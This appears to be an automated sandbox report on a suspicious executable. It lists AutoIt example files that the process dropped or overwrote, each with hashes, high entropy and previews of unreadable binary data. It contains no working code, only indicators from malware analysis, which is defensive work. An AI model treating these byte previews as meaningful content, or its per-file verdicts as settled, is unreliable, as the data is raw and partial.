                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):993
                                                                                                                                                                                                                                                Entropy (8bit):7.776916246887058
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:/5dOrHp3K9bC+sTZaYjmJrc0YXUZtwsTe6:/jEVK1DsTZam4o0jZtwZ6
                                                                                                                                                                                                                                                MD5:447A8EC9DCA5DA5B1370B887014215ED
                                                                                                                                                                                                                                                SHA1:CAB1EFB492DE02746622F7FA1D04EEB6C37FC64D
                                                                                                                                                                                                                                                SHA-256:A9D5648B950161542CDBA22949C73FB1F63B79D65FC2C23454CFB25C292BB608
                                                                                                                                                                                                                                                SHA-512:38EDB20F9A1C8849778833994FFF919AB22FD429C00CFDBE3437F4260991CE074ED2C8C1677D2323E9DE6D4E2BF666F02E19B1CED788127917361553DA435D3E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.. ..,.juYCzki.:..{.......2.....&m.........F.Gk...Xp.?w..?U..6......[.8...F.....U.0....t..K2.A..V3.b8<d7C.U.)... u......s.g.N..w.~I.,.....6.....ri..Ki.....K...e~..d.b.{2..F..0.S.].Xx...;{...E..I`..d..W.!$....&...F..s.D.8...h$.7m..7-..F.........$...6......=...d...Q'......F..w.O3.c....?p..:.H-.....J...V.n..|.Z.;.q."x!...M.|.......^....-..i._....L..N...+E.*.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......}7....TH..cNV..$.`.e7M;....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayUnique[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1152
                                                                                                                                                                                                                                                Entropy (8bit):7.839286546983755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Eh70Zk4Z3wQC1LHRrFwjmJrc0YXUZtwsT+8nC:maJv67RrF+4o0jZtwR
                                                                                                                                                                                                                                                MD5:BCC858F937BAEFEBB4784D8AD460EFE9
                                                                                                                                                                                                                                                SHA1:3E630698DA86D8390F357D3D66A387138E799907
                                                                                                                                                                                                                                                SHA-256:B8A7C5C0260189F2D5F466218D3AC3E6F96BECD9FDCAD9845A46C5D7034E84BF
                                                                                                                                                                                                                                                SHA-512:68FAEE11C639F225DBA76D84DD50CC6977993666893FFAB392686BE5A4D8D9B3FD1382480245A7F1175025A1B5E580F6C0892BC68617F75395E7A1805D709940
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:B.5.\...|$mpv..w.\X%...2.M...@....[*...3........1..V(..../..o....^H.9...-..BB...i.-_3..+#...5..m.{..@...dq....<.P.N..d.M...la[E..S9....u.6.p.+..... .=.2.....=..&."..S...ur...K.R.IH&B..wF."B.Y.....R.R...mM...V..........J.n.C|p%)C`~b....H...X....J^.@....]bW..BB...6.>.N(..x.D.~d...+..=.g.^.&oCH........b..!..S...G.....B..j.(N.....h....g..+.:.NZ.-^&.\..... .S.-.-.#...Z.G<...M..UK}.V.g..*....Y.TA.g..1.ZMI.c.I.........`..:F.Y.+i..-.k......52.'{.6..Sv...9...f......<>.xa_.2.@c..J.......z..f%../xA...9.y..n.?(z.0x:CH..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Assert.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):787
                                                                                                                                                                                                                                                Entropy (8bit):7.701565658725054
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:aMEF+dK/c2CAln++8ydjmejaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsOL:avN/iAln++8OjmejmJrc0YXUZtwsTYtk
                                                                                                                                                                                                                                                MD5:BEEA8078FD1A3C80D0BB811AE3417195
                                                                                                                                                                                                                                                SHA1:072B972167290389B9460CCB3B35B737E4598D18
                                                                                                                                                                                                                                                SHA-256:45A9E57F076CE329CA66847ED977859D710D75F3BFFBB032A51DFEEF04A83240
                                                                                                                                                                                                                                                SHA-512:C702D855C5015E141ADE2CAA5C810DD59A537975921775F426C102F344E70800EB5FA67EB5002422DA344F1BE6AFE9DF89CACB147461AA6C6DAD2483FB28FC41
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.5l..rX.."oNP.z..'."....Q....8~.p..wCuu.#....ME...g.aO3J-M.Ay.....9.....*...% .q......Wh.$..D..f1Bd..Y.........PUC....qd. p....d.J.xSH..>....#.f.D.V.V{...<.7l.6..=....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.{.......'g..?....Q-7..B.uo....$k.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ChooseColor.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3410
                                                                                                                                                                                                                                                Entropy (8bit):7.942893933694085
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:zmGQVmZ8Ngd1tc9i6WJ450zhZXpfCpEhyd/gT1snkJ8pUfC7mF4il4o0jZtwx:yrm8NQcsDJi0b5fCO+I1skJb46pOlex
                                                                                                                                                                                                                                                MD5:9EC962EC0A328AAF12A55F8D2C13D11D
                                                                                                                                                                                                                                                SHA1:F1B2C92BA1F6B19F69479A47FB3BA8AB63C44531
                                                                                                                                                                                                                                                SHA-256:2D04966CFCFFAA08069D0BD94478465FEAD358DCDDA7F41FC5FC9FD25F742C39
                                                                                                                                                                                                                                                SHA-512:C270E138EA99019A56E72B2C4AF7DA5C307F57722A294FAA0D57F003416D89111A421213C5DAC74AA9EF153B884AF407C200203B9172B175AB66F82647F2EBAB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.H9j.xq}..).n^...;...j8nV......~=E.R.=..;r....o..&G..d.Lq...].B#^..9.~."......%Q% .K..<!..M...SrR.!.^......8..@..`5..@.U..:.V...K..pQ..L6..b.D..%...^.e.nL.G.0.Jw....:e.+Z-o...J.3.|..........GoE`.~..L..%...t.Wc.....U.f.E.Yo|..2.R+td..Z..%..C......H...e..F`.'..........a|....[.`R...R....,.O...6......*..q......?._..-..K..~&...}.x.k"0.+..!@......:..X.5..Q..i....e^...-K...9.....m6.bOR.!/+..8N_.~......-6..:.TX..Uc.&....j......M.C.2.:..R...c..6..9.....LAW.. .}.._.*..6.'s$...#..M..[fYx.3...(..9.C7$.....Y...E.....M...9.c1?...4.k..V{.?..".%../m.O=W.7..F&..l..t\.*+.[..,.....C....X.G..>....... .#....3{ym.5d..w...Q.?O..a.....7%..P.1.7P.56.....\D/...._......_....|..%.Jg%....YO..u)O...y.... 1......w.5....Pr.dS.R.a.~qK'.z.!....C.+.B.&.m&..J.-..W.P..2.Q ...........8f...e......_#..(.s.`..D.7..w....7...R.T.:n~_...(........)A~W..\.]<..yt.9H..o..#.j.....jZ..;Xy. ..u.s1.?'l.L..jd.........%.b.......U(.^..9}8.gT...'.....S..>5...g..u..=.._..z}).xc..V..ni..<3U.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ChooseFont.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1056
                                                                                                                                                                                                                                                Entropy (8bit):7.804177496700628
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Q/Cge54uxzXv5jo90KlS7f+ZthrjmJrc0YXUZtwsTKW:QqV7xzxjodS7+Z/v4o0jZtw0
                                                                                                                                                                                                                                                MD5:A2054CAD391736F9A0713219E590B837
                                                                                                                                                                                                                                                SHA1:C7C3B2E285E6004134A3286B15017C5B239F730B
                                                                                                                                                                                                                                                SHA-256:413400522A63D2C9DB265F679F896FF8A89639D3085D3B56F9A5AB6D3953FA35
                                                                                                                                                                                                                                                SHA-512:A009EDD0C28CDE9D6A0F5FC6ECBDC375D166BC61C2E32792FB532BF5BE14A4DBF14B895B399E6EF9C14EBCC443D3DD7EB0758B92FC624B6927385F64BCD84CE2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:%..Y|N..E.3LT-.WD.n.w=.......o/.E.c...`.K.....ar......<...[.4e#$...*....l+8....{.Z.}s......(..'...Nc..U....g...@...o....D...z....1n..|Tt,.C+.w....g..1.4.8rUt....Q.)x...<".[....v..O...=ll.=.\.P.o-.A8.............c..R.J. p.UC`............Oj.?a7?.Ba.'....-..uZc..Yg[.!...bk|(..U..Q.p..5w...r.....i.>`.A...[.../.....aj.3.6x...RB.I.AE8D...h.c,.#....h.r$.t.tN3...., .[9U.;..j..f.1.d1J.#[/..+sF...5..'b;b._.......d...O.).7..z.Ae......{.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.2.9.uPM.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ChooseFont[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1058
                                                                                                                                                                                                                                                Entropy (8bit):7.786396380853925
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Spa7+humbgvNQLTQ57vtI8KjmJrc0YXUZtwsTWFbnty:H7c1LiJjU4o0jZtw9Vk
                                                                                                                                                                                                                                                MD5:AC541A2F59C41BC3A7FD2E4F39E05637
                                                                                                                                                                                                                                                SHA1:C6C2C2B29BD98F6AEEF64A19316463A46D9C1412
                                                                                                                                                                                                                                                SHA-256:A5F0C60AB2A6F20AB1F0513F222963E83D8EB4848BE38127E1A88630DB572954
                                                                                                                                                                                                                                                SHA-512:D6254D62DD3E1CC3E8E012D24C684B4AB00BFC99397832CDB9633620C59459CEA4C09B0CBDFD78A59539BFFE723AD900C60A247CABB45C9987345C4105051AF8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.da..zYej...X\6..(v$..]..w.-f..N....?dSL5.-....&....<4..F.....0....I....S...*u1?...K......BB.Q...u..5.....^...+.g?...m....XOLC.U'>.f9....;).8....]-...T..=.!.....8.\.....xk..f.6.#Wb.t...#G........E.Z8M...P...]..._..N&..2p....S.O(..O.&......,..................+.`.8hQ.O..d.zP...IJ.J.z..q...?......._.............vI.I..#Jh.Yw.k5.=K2.3..s.*..-n...-.uR.pj.oKqq....m....'...yC..M.0..W.l.!.j.t.....d.&..M%.h..O.C..5&.\;.k.s.h~s..ya.N...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$......

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ChooseFont[3].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1419
                                                                                                                                                                                                                                                Entropy (8bit):7.856428033146176
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:IMO+cmfffMXlg+SSBhF+cqeLoO/jjmJrc0YXUZtwsTFy:8+c+ffM1g+BBT4o0jZtwUy
                                                                                                                                                                                                                                                MD5:996724BC780E607C715ADE2C6972B6ED
                                                                                                                                                                                                                                                SHA1:A00BA67DF321FC047993A5B812FCDD1800470782
                                                                                                                                                                                                                                                SHA-256:82AEB9349C3E6F43B92F9F6B075A5AFCDDADB555E1043F9E4B8D839C81D1FBAA
                                                                                                                                                                                                                                                SHA-512:F9AD703348112E126BE3389BF8D76BB83D0D133F2BD81FA3BF67E6A79A4CDFA63C8DA14E4ED0238C124FD2FE9E3C90CAA765115475B5CE56AABCE804126781E9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:f..0..4.....T.....iK...z_Quw......~P.Q.pp.....Y]H....{9^H.c....<....YG..h......pa...R.g%....A....&S0O......V,.8...~.....c......k.,..j..!.vg~..`G.o:..ut.'.o....l.......<.F.9..F.......O^W......w.....w6.}..8HuWi.o..i...v...1@ ./..^.J\....<=CgH.....Ph..*..q5F.....=.a&..=........w.<.Q...?C.c-.9......I4v.....R[O.`.s\o2CXj..3......z._.j.TnG/..]...N...6...]..^Vp.~....e"-..P...#U..)...m.....I..e..........X....z.-..hB."G6X.PH..$.i\...=..-..,..]...2D........pa..?5.%(0..5v....../-b....A..I.h ...M..U..C....D......z....X..A<..D.[0-6..b<AuX..`._^y....R_..L.{J.}`.F7m.{.~..W.i..Py.w..~..X.kX.fUQ..;.3..=.{.....S...p....VMkJ.Uk..!p.........tm.g....+?..E..x...'..z:!.~a..]XFF''p`...m...c..=...~@.s.....4. $.qK.0C..C .-.b....af.I....&.[,..t'U.1..O.^.a..Q!0/........u....wd...:t.I...X...h.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_ChangeChain.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2356
                                                                                                                                                                                                                                                Entropy (8bit):7.912025600881806
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:6gcIWMvDQ8yAKwOgMmDXUx1UPbOmcqg1Qkx4TyJU8VIeBU4o0jZtw1t7:Bcb8y9gMmDXCxmcqKQ2u8OeBdle1t7
                                                                                                                                                                                                                                                MD5:B51B58BAD58D508DB2D1E7DBFE3302A8
                                                                                                                                                                                                                                                SHA1:F18843574DF789F44D3EFCA2CD48F1EBA55AE365
                                                                                                                                                                                                                                                SHA-256:AE9831E7CE1729F14600066443E196DAB0ED2D29AEE6AAB2D6BCA8F38DEBA228
                                                                                                                                                                                                                                                SHA-512:7F8B67310F9AB1461BEBBC53E0FF655B456FDE4291ECE695113E3652EF435548E2972D54A11EEFCF5E830F3B3BA235B1B4B104E889B66ADB8E1C3E2954A85D99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:!..5S....x.zD`/....Y...7.I?.@....an.P...16........=.^.T&._.:b.h.s9... .=...3..3..S.6(.zQ...V..*........_...8V%P3.kA.N..z)3.7v..]...>.F*....X.60n....F.8...*.':IE..@xA.(b.7/ Z..6q.=..j6G.`5#..._..* ..$s.^..{......w...........^...I%"......!.x..r..."..[\.>...#|.luQ^..L&$..6.......E..Ja........ .Ehg.,ka..)lY{........L...zb.Xa.-............;o....[Bk./~..Y....~(..v..j..W:....a%..E-.......Y..bX....-.*S.x..C.`St'.I.,.[I....b.m.i..a3]v.~.._......=..J...9.........|.j$...'...../=A.F..0.......%...<....K.t'MS.M.@RY...(.9,.2...o..)..R..~........=.E.t..2o.U....*..hlsl..Z\_..is..M.W..=...'.U8..H.$.j.>..o.T.j'!2.4qo.a....YF..;......o..C..y#...Q4]......x.b..#..........q.M.u...R1.h..}..o....9."..t_8p......8.M...9..*.~..5. t.|Qp{K........O.L...a!.>....9.B....r##Z^V......6.u..@.}.\.C\b.N".l...*b.. ..@~y+.=.=%..N9v.............W{!.I.f.V..K....]%].d.....n...8u....R.]....Q.I...G..#...S.[..JF.,..9k.;}.....m..' ..E/...e[.....~.... D.z;....5x.u...B..E.k.p.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_Close.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1695
                                                                                                                                                                                                                                                Entropy (8bit):7.870068931933657
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:+Sfj6RRc/M70pY4jsauhoTG7B84o0jZtwvk:+SfORzIy4Qauho6Bllevk
                                                                                                                                                                                                                                                MD5:D663A7AFC2709DC9BFEC67B8F06DF620
                                                                                                                                                                                                                                                SHA1:92E11D5B7DF1180785260FB551B8CDBE0481E13D
                                                                                                                                                                                                                                                SHA-256:E3E93C024007D20904272946570E732E26D557DB719F625FF27B7CA90620E9A3
                                                                                                                                                                                                                                                SHA-512:E884354639B14698548D42CCF1311F9BAFB59BBA8C274E7FC45A0CB14873B51947FD1DB665B2256C4F86F62310A060A43F86152E0308427259C921EDD390167E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.M5..|..pO ..{i.4!.ZX...J@..@.5..^...@V.}]..X........q-..S.'gz!4'........]..,.(."%..../...&.....x.X|."d.e....I...%.z.3~]3.n+.P..i.wF..5..'.d.....7/.o...K...E.A..=...w...0"Bp..qU...l.. ..m.._t...w~8>.Z.Bm$...UP....*.[r.w.8%...C.Za.+v.....y..+.[b.....*.z..5....>L.ro..Z.~K......(M..l.o.uP#...N..3[...v..U"...........v+....[G'.,6HN%ff.c.....CY.~.:y.x...8.W".U.. <...].....V\&.\..O}..W.R...."...Q6..k6.rt.....S=..f..C......H}).i..y/%pb...#n!..4.E..b}.......3y..x.O{...L...P.NW...6...._8.A..Qy0.<(.,.u...'..f0.!...+S.>.....PtH:..&n.4...m#.....')S..V^.......B...cT._.P..k..s.o.!O.M.L"...\"........(.._...t./....S.....f.....t.V{.....B...d ....<....,.N.......r`.}m.-.....L7O.>i.]Y?.....LH.Z...$....x.Y.|.y.....D....".Vz.:...cT..(U...L....g6..B.G.B.w#..E...J.. l.#.Hz...U..>-UT.[....[....L.L..9r#%.'......>....2.6}^..Z.F...E<[9.2.G..a..'1....'...k.H.&.h........S.).=........................._.......F..U.(..Q.$.../+...&.Z...Pf._.I..D...n.I......h3.9'....P...E\m.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_Empty.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1871
                                                                                                                                                                                                                                                Entropy (8bit):7.886744984843462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:8POSLwkkqCdd0f3yyfGJiuVB8e14o0jZtwmnQ:ZSLLkhdd0i7J9ceelemnQ
                                                                                                                                                                                                                                                MD5:1295689B449C509CE8DE2330E7073E41
                                                                                                                                                                                                                                                SHA1:641109972B27419B0B6FDE46DD5F969184889CDC
                                                                                                                                                                                                                                                SHA-256:4368242C9D59F4745BD5F55AB3E8FF5D9067EF680D7DB27E03E5D8D8D8787B4A
                                                                                                                                                                                                                                                SHA-512:6000951E381B09E0A1C00E08F9F9C1C33A544401F2843AA94C7BD39C1BB34945411FF16431398A51A172F29F141FAE67E7BF90027ACEC10DC185833E56E332E9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...+..#..%...-.....(.M....C-Z.F...]uKj;..w...a+..Rem.Q..."...P..DY....H....W.}..........."...)..Ot1z..KNb2........T.v..*h.c.-&4.[E..{m....B;v.].....q'..,....<4......1.x..y...FC..\].....!..z..eO..k.F$)>.s7..^v.;.5.p..v....b...;..8........\..H..T....H#.":4.%"..s._T..@,....Q.....z.L.<*.-Q.5..."aG.d..V.}....O...P!r.........ho...}...t..H..[o.tc.Y.A[~...;.U!iv..I....a.E.L.k..Lz..t.ob.....[.....l.b...-..i....d............^F..'..s...5.v......../e./.!j....ba|...N.5...K...B..(...:qK..q..e...|...w\...h...WQ...x....U..H.Pi#.7.)..."..#.V..-.bu..\...3W..<2s$t<.H.HP....;.+*I.r.N(.!q.a!6......7..1...5.u.....TAw.tQ.|.a..._4.6.X.-u*G..{Xu=.|0.Y...M.q.B.b.9.:.l.j..h.k..g..7..O..zG04D.,..F..Y......`......g.....j....1.(.....g=.rg4e...... m..yt(....Y.^......R.l.t...Uo..#.$F\..^..&..q.u.....x8.C.&..6.>.'m..'A..d....p.=}5Z...:..S.....+7...H..fz...S.Hgi.< <..N..eE'.J......r....-...X..(k....E.I.f.>..f$Ju.=K.|..R ..u...L.O...9...(W...b.wa..a.U....n..w.C/.R....7...t

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_EnumFormats.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1776
                                                                                                                                                                                                                                                Entropy (8bit):7.880209919442462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Nt3uw/fw4+4vT5HCLY9mTcWq94o0jZtwV:Nz/fwCTFl8TcWpleV
                                                                                                                                                                                                                                                MD5:1C88EC79E48C6CE9398B7A79ECC8CFBA
                                                                                                                                                                                                                                                SHA1:E04CE6659973D91681E91960159BAAAB16C075DF
                                                                                                                                                                                                                                                SHA-256:4B43CA0B2FF0733AF57A80C6318C5476727CA8D947436E5C03FD9576159C3955
                                                                                                                                                                                                                                                SHA-512:B831B6A4EC5D17DDE2985C6B0E1CC5A9A3EA9D0F5BFF033686B9915ADC57FE1620E2CCAEDCAAFAFBA60334D5402FC111310FCE8327F5703848E1BCA50257AC63
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:W.8.v0.z5Xm.....05....U6=S.)64....v..4.-........@.U..m.P...@.'0^..'.Z.]....F>e.\.c..n.....,.....2.:@?.T..4.......9...9.-....u}.t....VJ...lq..a..vo.but.....'...zO.A1[.....G:..u..m.;~)...L;.6..X...S.ph.0.WGG61.....~..!t.O..]g.y..}.a`xi.rh.I...P..`.b:<0.zQ......Z....[......n....2.FK..Y.!.|.4u.q...B....*...g.K>.D.k\.@wDE....wL.M..]....I..g......-.C........q...[-|..XG..&.}..8.Z..=..J.8.....:..:.. r.|.J.\..Vf....w...fn........Q.......X..l.F...9.....;=#....:Jt.uY.~...s.R........iN..5<z.Zk.~MFs..;=...lc.a^..........5.....CD..P......tiNk.j..u....v....E.@...K..$.pQ.V..3y.~R.._.e.4|0F....5..,.../...&a.o7..=.j.1....u..N.........9y...6.2..*Gn.`.+*...X.... .I....<yw.]./-...........2.W..Ru...&4....u>...P..]..F.O.A...E..n.w.U.8z..=....{.`....L.S......6Y...`......0?gXL..L......:G.a.m.J.I.us..[H.Fm....4..l.,...%H%@s..dH..V..2....qR..%..+....B.!.m.Q.!.}.Q.9.#.L.+../+.....l...:.#.1.70)Q......f.3....$].q2...S.."... P......!u.0.".........7q.jQ..]Y....2.=.. 8..`

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_GetDataEx.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2080
                                                                                                                                                                                                                                                Entropy (8bit):7.90489968087982
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:/4TSijoh4LsrujLl0vRHkW7wa4o0jZtwn:A+ijohu7l0VTw3len
                                                                                                                                                                                                                                                MD5:9F6EB78C6D6D7ACD04C6D6AFB07D54B7
                                                                                                                                                                                                                                                SHA1:33F4FDF991FD71C8CBCDF27DC51CADACE7DC2055
                                                                                                                                                                                                                                                SHA-256:39902B0A4C1C5200AC5DCEB464C194E9A3B50C47EDC4351DAC03B0AC22C72684
                                                                                                                                                                                                                                                SHA-512:D714D817AC0EA6F957B83EF33EB6088D52FF3F3EF8CAC719E0B46CB362610870DDB059F3F991BC53B002B9C13A49F1A13761A51C824AE41FA7988F0A25F6DD40
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
